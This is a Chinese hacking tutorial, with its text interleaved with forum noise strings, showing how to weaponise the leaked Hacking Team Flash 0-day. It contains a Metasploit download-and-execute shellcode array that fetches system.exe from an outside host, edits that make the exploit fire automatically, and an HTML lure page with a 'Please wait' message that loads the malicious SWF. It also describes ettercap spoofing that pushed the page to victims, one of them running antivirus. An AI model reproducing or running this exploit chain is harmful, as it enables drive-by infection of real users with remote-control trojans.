6 [6 r! O. o6 b, ` 三、flash 0day之手工代码修改制作下载者实例入侵演示 ( S- `. e, s7 e4 r
, m' c" S, J+ R! m G$ y8 f7 |) i' Q6 ?0 b( u
利用到的工具: * [0 ?2 E! o& b( Y" X8 `
1 w. E* D2 R& ~0 k; V& x
$ m. K1 q# D# w6 ~9 T: Y
Msf
# y+ s M% N' I& E) K, U% o( N
1 ` l: l7 e# \* I: |. K I {- S7 B5 ~- m- Q1 n3 x3 _. F, Y
Ettercap $ r- v6 x/ j8 l& o( q/ O
; F6 E4 a z! r, A. _
. t5 O3 z* B4 Z1 B% g8 J- X Adobe Flash CS6 n5 `6 W, C0 m. ~7 c4 [- y. r
! v4 H! D! r! Q' B; e" {
% ~3 N. x/ U' K4 O" [ Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
6 n* b O* a- i E * G% |8 F- U1 _: y. l9 R5 h
$ U/ }1 z7 d1 G; p; X! m3 M* \, f 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options ) _2 z1 {7 g5 }) n! p3 q2 _
7 m/ [; ]4 S* T* B6 o9 G. J
, `( } U& t$ s- m, C" D
如图: : S, \6 p/ z% S% P; R
5 p* ?7 K# J- X8 R1 u! f2 e9 D d! v5 N" R
$ n9 V7 l* f' r8 o" z7 j, B
9 ?/ m" a( P' A7 N4 }+ e3 p: I% H. W
. ^8 O5 I' Y! y/ b- h+ l ! O, k) M- k( o/ I
& m) Z8 I) \' I' X8 b# H
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: & h3 Y% N- c/ C
7 ^; s! N, H4 b2 A& Z) A" v5 l
8 Z' T+ T) A2 b2 I7 n8 w
7 g( Q+ F7 L4 ? 9 L" f8 V) c7 D; w( J9 x5 r
8 ?. v& R, P- i
, ~( R0 o) C7 W. G M
$ g# e, ?" o* a, g+ P) X& b! k2 O5 t4 }# [( T7 D- p5 t c
然后执行generate -t dword生成shellcode,如下:
( k% n. ]9 x7 G, n+ u
' q1 C$ X& p _8 X
; U. V2 U# v' G* s% }* A5 v / P k; ~- n1 C! C4 K6 ?) v
8 c4 r/ f! Q# R; Z4 x0 _0 k" ~$ P8 Z, S- ^2 }
复制代码到文本下便于我们一会编辑flash exp,如下: . X* a. j/ G$ h6 q; O# Y( Y: a( b
, L4 B, e' f% s9 X! F
% V( e6 L2 Y7 s0 D* A: v3 z* | 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31,
# N# }' ^8 Y/ \$ R% t9 T
4 `" @" g" c, N- r
2 b$ w T7 w3 T. ^4 X$ y 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, / Z6 g, \- y. ] N7 }3 G T& d
& p% `# o1 ~: `$ w! _' C
1 m+ l4 q( e6 k! |4 W( Y R 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
( I6 ~- M' n7 V: q7 M
- o! @" `2 T" u% a) A
8 z; }$ i8 f9 y: {7 {0 u9 u& @* _ 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, ! Y0 ]% j/ l' l2 X% h0 }
6 H+ q: O E, S2 e5 s6 A$ c* z& u6 M, u0 }; R
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 0 F, D1 a3 h( x. Y) H* y, J$ U# f: w
- |3 P. y1 E1 {8 s7 x8 J" ~: ^
) C& g' ^! V: M, z 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 6 }# Y. k3 J9 U' B+ _$ {
, W, V, u7 {0 G9 L
" K& b, u2 A# P% W( l. s 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
4 e- N) v \$ K ) x3 n7 Y, M3 H! W D& J a
2 ]5 M7 a, F$ ^$ Y 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, - p5 C" s$ W I5 q" f5 |) q
+ A/ ]2 Y6 C* A" J
2 ]" m9 r3 V) X6 B! e+ U 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 9 I: b* y* d& ]; C
3 H* h% T! v% z( f3 y/ z
$ u8 l+ t+ A# J' |& L6 M" \8 V 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, * ?6 [. k7 a' A" u* U. q
( ? N0 m1 E. I! g( c9 b2 T+ J, M% r. s
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
% P1 y& q. _/ @6 U/ ~& V
' I# U2 |% r, \. D: Q; \* T+ J' Q$ \- [+ E9 Y
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
* H; j- o8 m1 u0 H
. a8 J( x Y+ l8 _, Y7 A# l { |3 d6 C, d3 z |( e5 ], x) j
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
$ \4 K3 T( C; \ ^9 B, H 7 `, I. ?7 C6 ]! M( P
1 j/ a5 v/ v) E4 g
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
1 i6 R: Y8 }4 @# |- R6 e
; |) s$ T0 ~3 ]9 D) T
0 u1 S- s$ p' q; Y * \* X# ~5 T/ m- ?
! s9 x, Q$ ^7 ^+ ^/ {
8 X0 h- Y4 V! J: l+ F6 | & U. j* U& B9 Z
5 f Y7 h. I4 {4 B8 i, B6 B
- P1 G5 ]$ T4 M 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
. `) p# d( M( k( B- e2 S0 t
; |7 c4 _" b; j+ ]1 W3 N& a' ]6 |( E
- K2 B# i* [& s/ t9 j4 U' X% f 7 N5 J0 r% J( n! }2 ?
! L2 A( |) z1 |( {0 f* | 先修改ShellWin32.as,部分源代码如图: ! r' p1 a K/ c, T7 q
; O6 ~, i4 u* E6 v5 I" {
8 g. U. f: H, o5 r 1 w& X. c4 u3 j Z, g/ b5 k& O; x+ ^
& {, L& N, c0 e% Y4 O% l* t
0 t8 }! R& A9 g) D6 ^& @! H
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: , F; `# ~2 J( _! W4 n% t
, w( N, C9 K4 ^# |/ d2 z
- [2 P+ p3 Q+ H F: r / O6 F; |& W l2 w
: X$ [5 \- ]6 x' b
! j2 R1 k/ s; t 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
1 e2 X r) B/ Y$ d& S. N1 F2 _
$ O: \5 j" l! ~% A% ~5 L* @, p" X1 O4 y
' N5 E4 h F" G
& n: u# k, S8 \2 Z$ B/ {/ _$ A% J: P. t
换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
( c+ A' p3 b" O o! n , ^: }, ^% ]' i' ~- p, J v
) f% a6 U) ~" T3 o5 U& Z
4 u* q- A2 r0 r$ e$ z
9 |+ o! v- H: k# t: `' |% E- B
3 x5 k( B( g+ ?) c% p6 u
" l E: G! v" s" l1 L
. @8 }* E }; q# E5 O+ G% `# X8 o: n2 ?' S
: D6 Q6 e5 C! K5 }; q' u2 q
% u4 z% {2 u( p h" c) B; a9 t& x7 R7 z9 x- l- ]
然后点保存,下面我们来编译一下,打开
0 C% d8 L$ h! y
2 I3 s5 Q2 f6 P; |- \8 b2 R! H3 C% i5 I0 J! @* g
exp1.fla然后点文件-发布,看看编译没错误 $ _/ A! Z4 W6 J6 r3 Y8 V1 g
7 I8 n5 b2 g6 |: o, e& o+ b3 k; s! W9 ]0 j1 j, k
. V9 N+ t# V% B1 f: m/ O u + }3 z$ J- \2 h( f
9 r3 W7 t- N: n5 X7 X 9 J7 g0 V i& a
9 V4 q, d0 ]8 ? Q
- {+ [! c2 E( j: ?# M2 x
- r+ B9 |9 e' H- ^9 O5 t
9 w& \9 r' L5 D, s+ M; Z) x+ T, z$ r. V
8 U1 k* p- h: j, t) i3 M, v1 J
! }, a6 v w/ T" H. ^8 w) ^
# a$ ], W- A" ~8 F5 b
然后我们把生成的
1 l; x0 L% c& W! M2 M
! F+ V8 t* Q2 j
8 j1 {* Q( s, `: g a exp1.swf丢到kailinux 的/var/www/html下:
+ d8 u1 }, C% X! d: W
7 J- W: j1 ^3 `" t i5 J; H& o2 Z4 ]* k$ M* w+ A
然后把这段代码好好编辑一下
; {9 j. B3 Q' P* W4 k$ H
8 p' I* \' m4 G# \) B v$ C! F2 l( n: q- T& l; {6 T- n8 h
# a. \1 s/ t, ?; l O
7 P$ V. k; F1 K7 Q* s% u: \# ]+ p0 N+ u$ W7 [: Y. D
2 V J2 k. D; J0 ? + l+ ?+ H( I7 @ r9 m7 d1 u8 R: ?
9 L: G/ i9 }- L) l* i
( A O8 I2 Y; m
( `# n! U' s) O `% p
* y0 Q6 K" K* j: Y% D$ E
0 v5 @4 e) s( \& Z' K' r' t8 p1 ], u 3 g; {3 U* p) j# m8 z
0 n0 S) D6 J2 _8 ]+ z
; {+ i, g9 U+ U9 q& C$ n
' l0 G/ m( @% X2 S# U- p# L0 u9 ?0 i, U
# B4 P; |% F( I9 I8 i9 c+ t" G / S6 ~; u5 L- ^3 N$ [
8 P2 a0 N2 I: |1 f* s( t: A$ }5 n
' B6 z; z& Y8 K" c4 N; z8 T6 e <!DOCTYPE html> / u; f, p; p% W: T$ S9 {
) b% L5 t" b: o6 Q
# p7 W1 a* h2 E! \
<html>
8 e2 e1 N; y3 r x9 T4 c& q
4 O* o- p$ l% N+ o$ [( w
# F% F4 W& I6 J; ]6 p <head>
1 y/ Q; f( Q! `, F% t& a / g0 O1 R9 i# ^/ B
; g) a) H7 t0 x! F0 g5 A# {
<meta http-equiv="Content-Type" content="text/html;
; H$ @" p& U" f9 t ( p- j: \2 u- e) o+ c% f- i/ A
7 {+ H6 k, l. f" l& I
charset=utf-8"/>
H6 C: y9 V% c4 j7 m # u% y0 [# ^! V0 q" W0 c3 N
9 U1 ]- u3 ^. `* Z </head>
5 [2 N( w D6 G / w* G; `0 r: z" K& }5 i$ F
9 ~8 N* R$ n+ B+ R& o; X( W5 q <body>
3 ~6 z, O. Q: k. t6 f' n& s+ \
# R0 ~6 V6 Z$ g
% P6 v: c: ?$ B: Q4 G2 d8 }2 Z: { <h2> Please wait, the requested page is loading...</h2> & o5 Z1 y M9 E
' \" m- A; w$ V% N3 @* P2 u1 a( J. x1 w- s' A9 Z( L
<br> 4 t g) S- d* J6 e; [
' [0 y/ X" B* \3 q# a( [
0 A- x( z" I/ X" o( Z <OBJECT ) A2 r `/ H9 Q* w$ A
1 A- \( L. k3 J3 {3 U W. g
2 a$ B' } w6 C) `" `; d/ s8 o4 ` classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie " P7 {( f$ M% i' k5 V& ?: G4 s
" o2 W/ K; A+ R4 n0 m/ z3 c! B
n' v: l2 N7 j VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
+ l: L: Z% \. w) a) q( S 0 q: O$ w$ e; D; K K* }
( e" j3 C/ Q7 d& B6 Y; _
</body>
; m+ R( N' s& Y/ B
3 w _! w3 l4 F1 ?/ R; R# G5 d# x9 B; H6 K" `* u
<script> 3 O3 V: Y; z5 l" T3 a
/ }- k2 K! L1 U
- R( Q( g2 [- Y+ ^% N9 p setTimeout(function () { S3 c& c% X y: \3 f. r d
; e5 |5 T1 W, p: U S: _: t
- o# s+ v" T- O8 U
) H8 o' b+ |/ Y5 C( Y/ L; z + r( f# [9 K7 D4 K3 n3 E S
- U' @2 S" S @6 v
window.location.reload(); " j& h9 l. k+ a% Z
6 Z1 q) n @1 j! z) }1 ^' k+ L Z E2 k6 Y K8 g) R1 I
}, 10000);
- q) e' f% q" m {/ X* a. @/ X & L- G% M1 w6 Z; L! v
4 s% r. f, t$ h1 Q$ B
! |: { \1 r6 W+ ] $ ^) Z: \8 G2 ?4 }% `& V7 S% G: U
; F! T7 W' i+ u W4 S* V ^
</script>
/ Z# a/ z! ~4 n, B, c3 m( t" a 4 Q/ o% {1 @* P! Z4 |
+ V! m/ q9 d6 m% \) L
</html>
0 e1 J$ N1 ]0 G1 m: o. i" i! s
9 P' o4 z0 M) } ~& Y0 W) i' e0 M" M) p
) E7 c, M8 ]- L2 y/ S
: R ^) `# a! ^9 V4 ~$ |$ H1 B% M: S8 f) {0 h
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: & L9 x, A+ \5 s( }1 v
( l; A! T& x2 n3 X5 Y6 Y2 j3 q+ y
) D3 A) h1 m/ M2 [ / F* A' k4 V6 G7 x
9 z+ E6 Q* x+ S8 j- v* ]& n
8 X! I! k$ i% k
! A9 E" {' M- d& q, ]$ o5 f/ h
. W/ @2 O2 A# U/ t) t ! t$ h+ O6 |% ]2 W( d/ ]9 _5 W* ^
" _- {4 ~! q; _% ~& x/ J0 \$ l/ ~3 D
5 j% Y) j6 Y% c e- Y9 ~
( X& ^# b( G2 _2 L3 a
3 w0 o; l5 F4 W; s6 U1 I: v0 Z0 R3 D
% D( k* j7 ~5 n
0 ^; |" o3 o1 d K/ C) S( I
6 j9 ~% K, S% ?: {+ s2 P: }5 _ 下面我们用ettercap欺骗如图: & i+ v/ }- y( j! P
' b& R q# } h% A4 @$ d
2 j' T/ {% `' g9 L) }3 ~9 `
, L7 K4 [) F% A2 F2 r
C3 `, U7 {$ s, Q, u8 x, \6 h/ v& q5 Z$ H) H, T$ Q) P! p
- \" l& ]6 T; K* T1 H% } ! D c0 B9 W( ?0 }, w: {
) P) O0 P0 F+ @
下面我们随便访问个网站看看:
" @: k' B' d5 ?/ ?0 P
; S! y9 H) {% c& I! E5 i, K2 N3 M0 `/ L* B
我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
1 S& ~. D, B+ ~
; L* L! V8 z1 a, p" w# _8 w9 T* q. G- U: A& P
, v. h7 U; x7 C* J" Y
8 s( e3 U) D! G/ r
5 e( ?$ ^; \# B8 I% Y- S- K 我们看另一台,
4 a: l( n* j0 p* U7 _+ v) j, j , I; a: r2 f6 O5 J" e( ^& S3 h
5 C+ |- S/ X+ t" ?1 t 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
* }, ?1 B7 n! R U3 D |